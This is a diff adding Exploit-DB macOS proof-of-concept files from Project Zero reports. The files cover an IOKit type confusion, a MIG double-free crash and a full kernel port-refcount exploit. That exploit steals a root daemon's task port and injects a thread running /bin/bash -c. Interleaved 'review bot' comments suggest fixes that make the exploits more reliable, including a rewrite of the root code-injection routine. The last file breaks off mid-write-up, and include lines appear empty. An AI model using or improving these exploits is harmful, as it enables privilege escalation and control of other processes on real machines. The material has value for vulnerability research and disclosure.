bomb out now without further ado. + if (!userClientClass) + return kIOReturnUnsupported; + + // This reference is consumed by the IOServiceOpen call + temp = OSMetaClass::allocClassWithName(userClientClass); + if (!temp) + return kIOReturnNoMemory; + + if (OSDynamicCast(IOUserClient, temp)) + client = (IOUserClient *) temp; + else { + temp->release(); + return kIOReturnUnsupported; + } + + if ( !client->initWithTask(owningTask, securityID, type, properties) ) { + + ... continue on and call client->start(this) to connect the client to the service + +This reads the "IOUserClientClass" entry in the services registry entry and uses the IOKit +reflection API to allocate it. 
+ +If an IOService doesn't want to have any IOUserClients then it has two options, either override +newUserClient to return kIOReturnUnsupported or make sure that there is no IOUserClientClass +entry in the service's registry entry. + +AppleBroadcomBluetoothHostController takes the second approach but inherits from IOBluetoothHostController +which overrides ::setProperties to allow an unprivileged user to set *all* registry entry properties, +including IOUserClientClass. + +This leads to a very exploitable type confusion issue as plenty of IOUserClient subclasses don't expect +to be connected to a different IOService provider. In this PoC I connect an IGAccelSharedUserClient to +a AppleBroadcomBluetoothHostController which leads immediately to an invalid virtual call. With more +investigation I'm sure you could build some very nice exploitation primitives with this bug. + +Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555) +*/ + +// ianbeer +// clang -o wrongclass wrongclass.c -framework IOKit -framework CoreFoundation + +#if 0 +MacOS kernel code execution due to writable privileged IOKit registry properties + +There are two ways for IOServices to define their IOUserClient classes: they can +override IOService::newUserClient and allocate the correct type themselves +or they can set the IOUserClientClass key in their registry entry. 
+ +The default implementation of IOService::newUserClient does this: + + IOReturn IOService::newUserClient( task_t owningTask, void * securityID, + UInt32 type, OSDictionary * properties, + IOUserClient ** handler ) + { + const OSSymbol *userClientClass = 0; + IOUserClient *client; + OSObject *temp; + + if (kIOReturnSuccess == newUserClient( owningTask, securityID, type, handler )) + return kIOReturnSuccess; + + // First try my own properties for a user client class name + temp = getProperty(gIOUserClientClassKey); + if (temp) { + if (OSDynamicCast(OSSymbol, temp)) + userClientClass = (const OSSymbol *) temp; + else if (OSDynamicCast(OSString, temp)) { + userClientClass = OSSymbol::withString((OSString *) temp); + if (userClientClass) + setProperty(kIOUserClientClassKey, + (OSObject *) userClientClass); + } + } + + // Didn't find one so lets just bomb out now without further ado. + if (!userClientClass) + return kIOReturnUnsupported; + + // This reference is consumed by the IOServiceOpen call + temp = OSMetaClass::allocClassWithName(userClientClass); + if (!temp) + return kIOReturnNoMemory; + + if (OSDynamicCast(IOUserClient, temp)) + client = (IOUserClient *) temp; + else { + temp->release(); + return kIOReturnUnsupported; + } + + if ( !client->initWithTask(owningTask, securityID, type, properties) ) { + + ... continue on and call client->start(this) to connect the client to the service + +This reads the "IOUserClientClass" entry in the services registry entry and uses the IOKit +reflection API to allocate it. + +If an IOService doesn't want to have any IOUserClients then it has two options, either override +newUserClient to return kIOReturnUnsupported or make sure that there is no IOUserClientClass +entry in the service's registry entry. 
+ +AppleBroadcomBluetoothHostController takes the second approach but inherits from IOBluetoothHostController +which overrides ::setProperties to allow an unprivileged user to set *all* registry entry properties, +including IOUserClientClass. + +This leads to a very exploitable type confusion issue as plenty of IOUserClient subclasses don't expect +to be connected to a different IOService provider. In this PoC I connect an IGAccelSharedUserClient to +a AppleBroadcomBluetoothHostController which leads immediately to an invalid virtual call. With more +investigation I'm sure you could build some very nice exploitation primitives with this bug. + +Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555) + +#endif + +#include +#include + +#include + +#include +#include + +int main(){ + io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AppleBroadcomBluetoothHostController")); + + if (service == IO_OBJECT_NULL){ + printf("unable to find service\n"); + return 1; + } + printf("got service: %x\n", service); + + // try to set the prop: + kern_return_t err; + err = IORegistryEntrySetCFProperty( + service, + CFSTR("IOUserClientClass"), + CFSTR("IGAccelSharedUserClient")); + + if (err != KERN_SUCCESS){ + printf("setProperty failed\n"); + } else { + printf("set the property!!\n"); + } + + // open a userclient: + io_connect_t conn = MACH_PORT_NULL; + err = IOServiceOpen(service, mach_task_self(), 0, &conn); + if (err != KERN_SUCCESS){ + printf("unable to get user client connection\n"); + return 1; + } + + printf("got userclient connection: %x\n", conn); + + return 0; +} \ No newline at end of file diff --git a/platforms/macos/dos/40954.c b/platforms/macos/dos/40954.c new file mode 100755 index 000000000..de30c342b --- /dev/null +++ b/platforms/macos/dos/40954.c 
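Review bot: main() carries on to IOServiceOpen when IORegistryEntrySetCFProperty fails, so on a kernel that rejects the property write the run ends in `unable to get user client connection`, which cannot be told apart from a trigger that simply did not panic. Make the failure terminal, `printf("setProperty failed - property write rejected, likely not vulnerable\n"); return 1;`, and put a comment before IOServiceOpen stating that a panic inside the open is the expected result on a vulnerable kernel and that reaching the final printf means the type confusion did not fire. The service port is never released; `IOObjectRelease(service)` on each exit path costs nothing and keeps the PoC clean when it is looped. The `#include` lines are shown empty in this rendering, presumably an artifact of how the page was extracted rather than of the committed file.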
@@ -0,0 +1,180 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=954 + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40954.zip + +Userspace MIG services often use mach_msg_server or mach_msg_server_once to implent an RPC server. + +These two functions are also responsible for managing the resources associated with each message +similar to the ipc_kobject_server routine in the kernel. + +If a MIG handler method returns an error code then it is assumed to not have take ownership of any +of the resources in the message and both mach_msg_server and mach_msg_server_once will pass the message +to mach_msg_destroy: + +If the message had and OOL memory descriptor it reaches this code: + + + case MACH_MSG_OOL_DESCRIPTOR : { + mach_msg_ool_descriptor_t *dsc; + + dsc = &saddr->out_of_line; + if (dsc->deallocate) { + mach_msg_destroy_memory((vm_offset_t)dsc->address, + dsc->size); + } + break; + } + +... + + static void + mach_msg_destroy_memory(vm_offset_t addr, vm_size_t size) + { + if (size != 0) + (void) vm_deallocate(mach_task_self(), addr, size); + } + +If the deallocate flag is set in the ool descriptor then this will pass the address contained in the descriptor +to vm_deallocate. + +By default MIG client code passes OOL memory with the copy type set to MACH_MSG_PHYSICAL_COPY which ends up with the +receiver getting a 0 value for deallocate (meaning that you *do* need vm_deallocate it in the handler even if you return +and error) but by setting the copy type to MACH_MSG_VIRTUAL_COPY in the sender deallocate will be 1 in the receiver meaning +that in cases where the MIG handler vm_deallocate's the ool memory and returns an error code the mach_msg_* code will +deallocate it again. + +Exploitability hinges on being able to get the memory reallocated inbetween the two vm_deallocate calls, probably in another thread. 
+ +This PoC only demonstrates that an instance of the bug does exist in the first service I looked at, +com.apple.system.DirectoryService.legacy hosted by /usr/libexec/dspluginhelperd. Trace through in a debugger and you'll see the +two calls to vm_deallocate, first in _receive_session_create which returns an error code via the MIG reply message then in +mach_msg_destroy. + +Note that this service has multiple threads interacting with mach messages in parallel. + +I will have a play with some other services and try to exploit an instance of this bug class but the severity should +be clear from this PoC alone. + +Tested on MacOS Sierra 10.12 16A323 + +############################################################################## + +crash PoC + +dspluginhelperd actually uses a global dispatch queue to receive and process mach messages, +these are by default parallel which makes triggering this bug to demonstrate memory corruption +quite easy, just talk to the service on two threads in parallel. + +Note again that this isn't a report about this particular bug in this service but about the +MIG ecosystem - the various hand-written equivilents of mach_msg_server* / dispatch_mig_server +eg in notifyd and lots of other services all have the same issue. + +*/ + +// ianbeer +// build: clang -o dsplug_parallel dsplug_parallel.c -lpthread + +/* +crash PoC + +dspluginhelperd actually uses a global dispatch queue to receive and process mach messages, +these are by default parallel which makes triggering this bug to demonstrate memory corruption +quite easy, just talk to the service on two threads in parallel. + +Note again that this isn't a report about this particular bug in this service but about the +MIG ecosystem - the various hand-written equivilents of mach_msg_server* / dispatch_mig_server +eg in notifyd and lots of other services all have the same issue. 
+*/ + + +#include +#include +#include + +#include +#include + +char* service_name = "com.apple.system.DirectoryService.legacy"; + +mach_msg_header_t* msg; + +struct dsmsg { + mach_msg_header_t hdr; // +0 (0x18) + mach_msg_body_t body; // +0x18 (0x4) + mach_msg_port_descriptor_t ool_port; // +0x1c (0xc) + mach_msg_ool_descriptor_t ool_data; // +0x28 (0x10) + uint8_t payload[0x8]; // +0x38 (0x8) + uint32_t ool_size; // +0x40 (0x4) +}; // +0x44 + +mach_port_t service_port = MACH_PORT_NULL; + +void* do_thread(void* arg) { + struct dsmsg* msg = (struct dsmsg*)arg; + for(;;){ + kern_return_t err; + err = mach_msg(&msg->hdr, + MACH_SEND_MSG|MACH_MSG_OPTION_NONE, + (mach_msg_size_t)sizeof(struct dsmsg), + 0, + MACH_PORT_NULL, + MACH_MSG_TIMEOUT_NONE, + MACH_PORT_NULL); + printf("%s\n", mach_error_string(err)); + } + return NULL; +} + +int main() { + mach_port_t bs; + task_get_bootstrap_port(mach_task_self(), &bs); + + kern_return_t err = bootstrap_look_up(bs, service_name, &service_port); + if(err != KERN_SUCCESS){ + printf("unable to look up %s\n", service_name); + return 1; + } + + if (service_port == MACH_PORT_NULL) { + printf("bad service port\n"); + return 1; + } + + printf("got port\n"); + + void* ool = malloc(0x100000); + memset(ool, 'A', 0x1000); + + struct dsmsg msg = {0}; + + msg.hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); + msg.hdr.msgh_remote_port = service_port; + msg.hdr.msgh_local_port = MACH_PORT_NULL; + msg.hdr.msgh_id = 0x2328; // session_create + + msg.body.msgh_descriptor_count = 2; + + msg.ool_port.name = MACH_PORT_NULL; + msg.ool_port.disposition = 20; + msg.ool_port.type = MACH_MSG_PORT_DESCRIPTOR; + + msg.ool_data.address = ool; + msg.ool_data.size = 0x1000; + msg.ool_data.deallocate = 0; //1; + msg.ool_data.copy = MACH_MSG_VIRTUAL_COPY;//MACH_MSG_PHYSICAL_COPY; + msg.ool_data.type = MACH_MSG_OOL_DESCRIPTOR; + + msg.ool_size = 0x1000; + + pthread_t threads[2] = {0}; + pthread_create(&threads[0], NULL, 
do_thread, (void*)&msg); + pthread_create(&threads[1], NULL, do_thread, (void*)&msg); + + pthread_join(threads[0], NULL); + pthread_join(threads[1], NULL); + + + return 0; +} diff --git a/platforms/macos/local/40956.c b/platforms/macos/local/40956.c new file mode 100755 index 000000000..dab4d25c9 --- /dev/null +++ b/platforms/macos/local/40956.c 
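Review bot: `msg.ool_port.disposition = 20;` is a bare magic number; that value is `MACH_MSG_TYPE_MAKE_SEND` in mach/message.h and should be written as the constant so a reader can see the null-name port descriptor is intentional filler rather than a typo. The leftover alternatives in `msg.ool_data.deallocate = 0; //1;` and `msg.ool_data.copy = MACH_MSG_VIRTUAL_COPY;//MACH_MSG_PHYSICAL_COPY;` should be replaced by a comment stating what the write-up above already says: VIRTUAL_COPY makes the receiver see deallocate=1, which is what produces the second vm_deallocate in mach_msg_destroy. The file-scope `mach_msg_header_t* msg;` is unused and shadowed by the locals of the same name in do_thread and main; drop it. Neither pthread_create return value is checked, which for a crash PoC only hurts diagnosability, but a one-line `if (pthread_create(...) != 0) return 1;` makes a silent no-op run visible.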
@@ -0,0 +1,479 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=941 + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40956.zip + +The previous ref count overflow bugs were all kinda slow because they were quite deep in kernel code, +a lot of mach message and MIG code had to run for each leak. + +There are a handful of mach operations which have their own fast-path syscalls (mach traps.) +One of these is _kernelrpc_mach_port_insert_right_trap which lets us create a new mach +port name in our process from a port we already have. Here's the code: + + int + _kernelrpc_mach_port_insert_right_trap(struct _kernelrpc_mach_port_insert_right_args *args) + { + task_t task = port_name_to_task(args->target); + ipc_port_t port; + mach_msg_type_name_t disp; + int rv = MACH_SEND_INVALID_DEST; + + if (task != current_task()) + goto done; + + rv = ipc_object_copyin(task->itk_space, args->poly, args->polyPoly, + (ipc_object_t *)&port); + if (rv != KERN_SUCCESS) + goto done; + disp = (args->polyPoly); + + rv = mach_port_insert_right(task->itk_space, args->name, port, disp); + + done: + if (task) + task_deallocate(task); + return (rv); + } + +ipc_object_copyin will look up the args->poly name (with the args->polyPoly rights) +in the current process's mach port namespace and return an ipc_port_t pointer in port. + +If ipc_object_copyin is successful it takes a ref on the port and returns that ref to the caller. + +mach_port_insert_right will consume that reference but *only* if it succeeds. If it fails then +no reference is consumed and we can leak one because _kernelrpc_mach_port_insert_right_trap +doesn't handle the failure case. + +it's easy to force mach_port_insert_right to fail by specifying an invalid name for the new +right (eg MACH_PORT_NULL.) + +This allows you to overflow the reference count of the port and cause a kernel UaF in about 20 +minutes using a single thread. 
+ +################################################################################ + +LPE exploit for the kernel ipc_port_t reference leak bug + +I wanted to explore some more interesting exploit primitives I could build with this bug. + +One idea I had was to turn a send right for a mach port into a receive right for that port. +We can do this by using the reference count leak to cause a port for which we have a send right +to be freed (leaving a dangling ipc_object pointer in our ports table and that of any other process +which had a send right) and forcing the memory to be reallocated with a new port for which we +hold a receive right. + +We could for example target a userspace IPC service and replace a send right we've looked up via +launchd with a receive right allowing us to impersonate the service to other clients. + +Another approach is to target the send rights we can get hold of for kernel-owned ports. In this case +whilst userspace does still communicate by sending messages the kernel doesn't actually enqueue those +messages; if a port is owned by the kernel then the send path is short-circuited and the MIG endpoint is +called directly. Those kernel-owned receive rights are however still ports and we can free them using +the bug; if we can then get that memory reused as a port for which we hold a receive right we can +end up impersonating the kernel to other processes! + +Lots of kernel MIG apis take a task port as an argument; if we can manage to impersonate one of these +services we can get other processes to send us their task ports and thus gain complete control over them. + +io_service_open_extended is a MIG api on an IOService port. Interestingly we can get a send right to any +IOService from any sandbox as there are no MAC checks to get an IOService, only to get one of its IOUserClients +(or query/manipulate the registry entries.) 
The io_service_open_extended message will be sent to the IOService +port and the message contains the sender's task port as the owningTask parameter :) + +For this PoC expoit I've chosen to target IOBluetoothHCIController because we can control when this will be opened +by talking to the com.apple.bluetoothaudiod - more exactly when that daemon is started it will call IOServiceOpen. +We can force the daemon to restart by triggering a NULL pointer deref due to insufficient error checking when it +parses XPC messages. This doesn't require bluetooth to be enabled. + +Putting this all together the flow of the exploit looks like this: + + * get a send right to the IOBluetoothHCIController IOService + * overflow the reference count of that ipc_port to 0 and free it + * allocate many new receive rights to reuse the freed ipc_port + * add the new receive rights to a port set to simplify receiving messages + * crash bluetoothaudiod forcing it to restart + * bluetoothaudiod will get a send right to what it thinks is the IOBluetoothHCIController IOService + * bluetoothaudiod will send its task port to the IOService + * the task port is actually sent to us as we have the receive right + * we use the task port to inject a new thread into bluetoothsudiod which execs /bin/bash -c COMMAND + +Tested on MacOS 10.12 16a323 + +The technique should work exactly the same on iOS to get a task port for another process from the app sandbox. +*/ + +// ianbeer + +#if 0 +LPE exploit for the kernel ipc_port_t reference leak bug + +I wanted to explore some more interesting exploit primitives I could build with this bug. + +One idea I had was to turn a send right for a mach port into a receive right for that port. 
+We can do this by using the reference count leak to cause a port for which we have a send right +to be freed (leaving a dangling ipc_object pointer in our ports table and that of any other process +which had a send right) and forcing the memory to be reallocated with a new port for which we +hold a receive right. + +We could for example target a userspace IPC service and replace a send right we've looked up via +launchd with a receive right allowing us to impersonate the service to other clients. + +Another approach is to target the send rights we can get hold of for kernel-owned ports. In this case +whilst userspace does still communicate by sending messages the kernel doesn't actually enqueue those +messages; if a port is owned by the kernel then the send path is short-circuited and the MIG endpoint is +called directly. Those kernel-owned receive rights are however still ports and we can free them using +the bug; if we can then get that memory reused as a port for which we hold a receive right we can +end up impersonating the kernel to other processes! + +Lots of kernel MIG apis take a task port as an argument; if we can manage to impersonate one of these +services we can get other processes to send us their task ports and thus gain complete control over them. + +io_service_open_extended is a MIG api on an IOService port. Interestingly we can get a send right to any +IOService from any sandbox as there are no MAC checks to get an IOService, only to get one of its IOUserClients +(or query/manipulate the registry entries.) The io_service_open_extended message will be sent to the IOService +port and the message contains the sender's task port as the owningTask parameter :) + +For this PoC expoit I've chosen to target IOBluetoothHCIController because we can control when this will be opened +by talking to the com.apple.bluetoothaudiod - more exactly when that daemon is started it will call IOServiceOpen. 
+We can force the daemon to restart by triggering a NULL pointer deref due to insufficient error checking when it +parses XPC messages. This doesn't require bluetooth to be enabled. + +Putting this all together the flow of the exploit looks like this: + + * get a send right to the IOBluetoothHCIController IOService + * overflow the reference count of that ipc_port to 0 and free it + * allocate many new receive rights to reuse the freed ipc_port + * add the new receive rights to a port set to simplify receiving messages + * crash bluetoothaudiod forcing it to restart + * bluetoothaudiod will get a send right to what it thinks is the IOBluetoothHCIController IOService + * bluetoothaudiod will send its task port to the IOService + * the task port is actually sent to us as we have the receive right + * we use the task port to inject a new thread into bluetoothsudiod which execs /bin/bash -c COMMAND + +Tested on MacOS 10.12 16a323 + +The technique should work exactly the same on iOS to get a task port for another process from the app sandbox. 
+#endif
+
+#include
+#include
+#include
+#include
+
+#include
+#include
+
+#include
+
+#include
+
+void run_command(mach_port_t target_task, char* command) {
+ kern_return_t err;
+
+ // allocate some memory in the task
+ mach_vm_address_t command_addr = 0;
+ err = mach_vm_allocate(target_task,
+ &command_addr,
+ 0x1000,
+ VM_FLAGS_ANYWHERE);
+
+ if (err != KERN_SUCCESS) {
+ printf("mach_vm_allocate: %s\n", mach_error_string(err));
+ return;
+ }
+
+ printf("allocated command at %zx\n", command_addr);
+ uint64_t bin_bash = command_addr;
+ uint64_t dash_c = command_addr + 0x10;
+ uint64_t cmd = command_addr + 0x20;
+ uint64_t argv = command_addr + 0x800;
+
+ uint64_t argv_contents[] = {bin_bash, dash_c, cmd, 0};
+
+ err = mach_vm_write(target_task,
+ bin_bash,
+ "/bin/bash",
+ strlen("/bin/bash") + 1);
+
+ err = mach_vm_write(target_task,
+ dash_c,
+ "-c",
+ strlen("-c") + 1);
+
+ err = mach_vm_write(target_task,
+ cmd,
+ command,
+ strlen(command) + 1);
+
+ err = mach_vm_write(target_task,
+ argv,
+ argv_contents,
+ sizeof(argv_contents));
+
+ if (err != KERN_SUCCESS) {
+ printf("mach_vm_write: %s\n", mach_error_string(err));
+ return;
+ }
+
+ // create a new thread:
+ mach_port_t new_thread = MACH_PORT_NULL;
+ x86_thread_state64_t state;
+ mach_msg_type_number_t stateCount = x86_THREAD_STATE64_COUNT;
+
+ memset(&state, 0, sizeof(state));
+
+ // the minimal register state we require:
+ state.__rip = (uint64_t)execve;
+ state.__rdi = (uint64_t)bin_bash;
+ state.__rsi = (uint64_t)argv;
+ state.__rdx = (uint64_t)0;
+
+ err = thread_create_running(target_task,
+ x86_THREAD_STATE64,
+ (thread_state_t)&state,
+ stateCount,
+ &new_thread);
+
+ if (err != KERN_SUCCESS) {
+ printf("thread_create_running: %s\n", mach_error_string(err));
+ return;
+ }
+
+ printf("done?\n");
+}
+
+void force_bluetoothaudiod_restart() {
+ xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.bluetoothaudiod", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
+
+ 
xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
+ xpc_type_t t = xpc_get_type(event);
+ if (t == XPC_TYPE_ERROR){
+ printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
+ }
+ printf("received an event\n");
+ });
+ xpc_connection_resume(conn);
+
+ xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
+
+ xpc_dictionary_set_string(msg, "BTMethod", "BTCoreAudioPassthrough");
+
+ xpc_connection_send_message(conn, msg);
+
+ printf("waiting to make sure launchd knows the target has crashed\n");
+ usleep(100000);
+
+ printf("bluetoothaudiod should have crashed now\n");
+
+ xpc_release(msg);
+
+ // connect to the service again and send a message to force it to restart:
+ conn = xpc_connection_create_mach_service("com.apple.bluetoothaudiod", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
+ xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
+ xpc_type_t t = xpc_get_type(event);
+ if (t == XPC_TYPE_ERROR){
+ printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
+ }
+ printf("received an event\n");
+ });
+ xpc_connection_resume(conn);
+
+ msg = xpc_dictionary_create(NULL, NULL, 0);
+
+ xpc_dictionary_set_string(msg, "hello", "world");
+
+ xpc_connection_send_message(conn, msg);
+
+ printf("bluetoothaudiod should be calling IOServiceOpen now\n");
+}
+
+mach_port_t self;
+
+void leak_one_ref(mach_port_t overflower) {
+ kern_return_t err = _kernelrpc_mach_port_insert_right_trap(
+ self,
+ MACH_PORT_NULL, // an invalid name
+ overflower,
+ MACH_MSG_TYPE_COPY_SEND);
+}
+
+void leak_one_ref_for_receive(mach_port_t overflower) {
+ kern_return_t err = _kernelrpc_mach_port_insert_right_trap(
+ self,
+ MACH_PORT_NULL, // an invalid name
+ overflower,
+ MACH_MSG_TYPE_MAKE_SEND); // if you have a receive right
+}
+
+char* spinners = "-\\|/";
+void leak_n_refs(mach_port_t overflower, uint64_t n_refs) {
+ int step = 0;
+ for (uint64_t i = 0; i < n_refs; i++) {
+ leak_one_ref(overflower);
+ if ((i % 
0x40000) == 0) {
+ float done = (float)i/(float)n_refs;
+ step = (step+1) % strlen(spinners);
+ fprintf(stdout, "\roverflowing [%c] (%3.3f%%)", spinners[step], done * 100);
+ fflush(stdout);
+ }
+ }
+ fprintf(stdout, "\roverflowed \n");
+ fflush(stdout);
+}
+
+// quickly take a release a kernel reference
+// if the reference has been overflowed to 0 this will free the object
+void inc_and_dec_ref(mach_port_t p) {
+ // if we pass something which isn't a task port name:
+ // port_name_to_task
+ // ipc_object_copyin
+ // takes a ref
+ // ipc_port_release_send
+ // drops a ref
+
+ _kernelrpc_mach_port_insert_right_trap(p, 0, 0, 0);
+}
+
+/* try to get the free'd port replaced with a new port for which we have
+ * a receive right
+ * Once we've allocated a lot of new ports add them all to a port set so
+ * we can just receive on the port set to find the correct one
+ */
+mach_port_t replace_with_receive() {
+ int n_ports = 2000;
+ mach_port_t ports[n_ports];
+ for (int i = 0; i < n_ports; i++) {
+ mach_port_allocate(self, MACH_PORT_RIGHT_RECEIVE, &ports[i]);
+ }
+
+ // allocate a port set
+ mach_port_t ps;
+ mach_port_allocate(self, MACH_PORT_RIGHT_PORT_SET, &ps);
+ for (int i = 0; i < n_ports; i++) {
+ mach_port_move_member( self, ports[i], ps);
+ }
+ return ps;
+}
+
+/* listen on the port set for io_service_open_extended messages :
+ */
+struct service_open_mig {
+ mach_msg_header_t Head;
+ /* start of the kernel processed data */
+ mach_msg_body_t msgh_body;
+ mach_msg_port_descriptor_t owningTask;
+ mach_msg_ool_descriptor_t properties;
+ /* end of the kernel processed data */
+ NDR_record_t NDR;
+ uint32_t connect_type;
+ NDR_record_t ndr;
+ mach_msg_type_number_t propertiesCnt;
+};
+
+void service_requests(mach_port_t ps) {
+ size_t size = 0x1000;
+ struct service_open_mig* request = malloc(size);
+ memset(request, 0, size);
+
+ printf("receiving on port set\n");
+ kern_return_t err = mach_msg(&request->Head,
+ MACH_RCV_MSG,
+ 0,
+ size,
+ ps,
+ 0,
+ 0);
+
+ if 
(err != KERN_SUCCESS) {
+ printf("error receiving on port set: %s\n", mach_error_string(err));
+ return;
+ }
+
+ mach_port_t replaced_with = request->Head.msgh_local_port;
+
+ printf("got a message on the port set from port: local(0x%x) remote(0x%x)\n", request->Head.msgh_local_port, request->Head.msgh_remote_port);
+ mach_port_t target_task = request->owningTask.name;
+ printf("got task port: 0x%x\n", target_task);
+
+ run_command(target_task, "touch /tmp/hello_from_fake_kernel");
+
+ printf("did that work?\n");
+ printf("leaking some refs so we don't kernel panic");
+
+ for(int i = 0; i < 0x100; i++) {
+ leak_one_ref_for_receive(replaced_with);
+ }
+
+}
+
+int main() {
+ self = mach_task_self(); // avoid making the trap every time
+
+ //mach_port_t test;
+ //mach_port_allocate(self, MACH_PORT_RIGHT_RECEIVE, &test);
+
+ // get the service we want to target:
+ mach_port_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController"));
+ printf("%d : 0x%x\n", getpid(), service);
+
+ // we don't know how many refs the port actually has - lets guess less than 40... 
+ uint32_t max_refs = 40;
+ leak_n_refs(service, 0x100000000-max_refs);
+
+ // the port now has a reference count just below 0 so we'll try in a loop
+ // to free it, reallocate and test to see if it worked - if not we'll hope
+ // that was because we didn't free it:
+
+ mach_port_t fake_service_port = MACH_PORT_NULL;
+ for (uint32_t i = 0; i < max_refs; i++) {
+ inc_and_dec_ref(service);
+
+ mach_port_t replacer_ps = replace_with_receive();
+
+ // send a message to the service - if we receive it on the portset then we won:
+ mach_msg_header_t msg = {0};
+ msg.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
+ msg.msgh_remote_port = service;
+ msg.msgh_id = 0x41414141;
+ msg.msgh_size = sizeof(msg);
+ kern_return_t err;
+ err = mach_msg(&msg,
+ MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
+ (mach_msg_size_t)sizeof(msg),
+ 0,
+ MACH_PORT_NULL,
+ MACH_MSG_TIMEOUT_NONE,
+ MACH_PORT_NULL);
+ printf("sending probe: %s\n", mach_error_string(err));
+
+ mach_msg_empty_rcv_t reply = {0};
+ mach_msg(&reply.header,
+ MACH_RCV_MSG | MACH_RCV_TIMEOUT,
+ 0,
+ sizeof(reply),
+ replacer_ps,
+ 1, // 1ms
+ 0);
+
+ if (reply.header.msgh_id == 0x41414141) {
+ // worked:
+ printf("got the probe message\n");
+ fake_service_port = replacer_ps;
+ break;
+ }
+ printf("trying again (%d)\n", i);
+
+ // if it didn't work leak another ref and try again:
+ leak_one_ref(service);
+ }
+
+
+ printf("worked? - forcing a root process to restart, hopefully will send us its task port!\n");
+
+ force_bluetoothaudiod_restart();
+
+ service_requests(fake_service_port);
+
+ return 0;
+}
diff --git a/platforms/macos/local/40957.c b/platforms/macos/local/40957.c
new file mode 100755
index 000000000..80bd80de8
--- /dev/null
+++ b/platforms/macos/local/40957.c
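Review bot: In run_command the status of the first three mach_vm_write calls is overwritten by the next call, and only the write of argv_contents is checked, so a failed copy of "/bin/bash", "-c" or the command string goes unnoticed and thread_create_running would still start a thread in the root process that execs whatever bytes sit at those addresses. Each write should be checked before the next one; the fence below folds the four writes into a table and checks every entry, which also gives the buffer arguments the integer cast mach_vm_write's prototype expects (the sibling 40957.c in this commit already adds such casts). Separately, `printf("allocated command at %zx\n", command_addr)` passes a mach_vm_address_t to `%zx`; `%llx` matches the 64-bit type. main also never verifies that IOServiceGetMatchingService returned a port before spending the overflow loop on it; `if (service == MACH_PORT_NULL) { printf("IOBluetoothHCIController not found\n"); return 1; }` right after the lookup would fail fast instead of leaking references against MACH_PORT_NULL for twenty minutes.
```c
void run_command(mach_port_t target_task, char* command) {
  /* … unchanged: mach_vm_allocate, address layout, argv_contents … */

  struct { uint64_t addr; const void* src; size_t len; } writes[] = {
    {bin_bash, "/bin/bash", strlen("/bin/bash") + 1},
    {dash_c, "-c", strlen("-c") + 1},
    {cmd, command, strlen(command) + 1},
    {argv, argv_contents, sizeof(argv_contents)},
  };
  for (size_t i = 0; i < sizeof(writes) / sizeof(writes[0]); i++) {
    err = mach_vm_write(target_task,
                        writes[i].addr,
                        (vm_offset_t)writes[i].src,
                        (mach_msg_type_number_t)writes[i].len);
    if (err != KERN_SUCCESS) {
      printf("mach_vm_write: %s\n", mach_error_string(err));
      return;
    }
  }

  /* … unchanged: thread state setup and thread_create_running … */
```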
@@ -0,0 +1,771 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=959 + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40957.zip + +When sending and receiving mach messages from userspace there are two important kernel objects; ipc_entry and +ipc_object. + +ipc_entry's are the per-process handles or names which a process uses to refer to a particular ipc_object. + +ipc_object is the actual message queue (or kernel object) which the port refers to. + +ipc_entrys have a pointer to the ipc_object they are a handle for along with the ie_bits field which contains +the urefs and capacility bits for this name/handle (whether this is a send right, receive right etc.) + + struct ipc_entry { + struct ipc_object *ie_object; + ipc_entry_bits_t ie_bits; + mach_port_index_t ie_index; + union { + mach_port_index_t next; /* next in freelist, or... */ + ipc_table_index_t request; /* dead name request notify */ + } index; + }; + +#define IE_BITS_UREFS_MASK 0x0000ffff /* 16 bits of user-reference */ +#define IE_BITS_UREFS(bits) ((bits) & IE_BITS_UREFS_MASK) + +The low 16 bits of the ie_bits field are the user-reference (uref) count for this name. + +Each time a new right is received by a process, if it already had a name for that right the kernel will +increment the urefs count. Userspace can also arbitrarily control this reference count via mach_port_mod_refs +and mach_port_deallocate. When the reference count hits 0 the entry is free'd and the name can be re-used to +name another right. + +ipc_right_copyout is called when a right will be copied into a space (for example by sending a port right in a mach +message to another process.) 
Here's the code to handle the sending of a send right: + + case MACH_MSG_TYPE_PORT_SEND: + assert(port->ip_srights > 0); + + if (bits & MACH_PORT_TYPE_SEND) { + mach_port_urefs_t urefs = IE_BITS_UREFS(bits); + + assert(port->ip_srights > 1); + assert(urefs > 0); + assert(urefs < MACH_PORT_UREFS_MAX); + + if (urefs+1 == MACH_PORT_UREFS_MAX) { + if (overflow) { + /* leave urefs pegged to maximum */ <---- (1) + + port->ip_srights--; + ip_unlock(port); + ip_release(port); + return KERN_SUCCESS; + } + + ip_unlock(port); + return KERN_UREFS_OVERFLOW; + } + port->ip_srights--; + ip_unlock(port); + ip_release(port); + + ... + + entry->ie_bits = (bits | MACH_PORT_TYPE_SEND) + 1; <---- (2) + ipc_entry_modified(space, name, entry); + break; + + +If copying this right into this space would cause that right's name's urefs count in that space to hit 0xffff +then (if overflow is true) we reach the code at (1) which claims in the comment that it will leave urefs pegged at maximum. +This branch doesn't increase the urefs but still returns KERN_SUCCESS. Almost all callers pass overflow=true. + +The reason for this "pegging" was probably not to prevent the 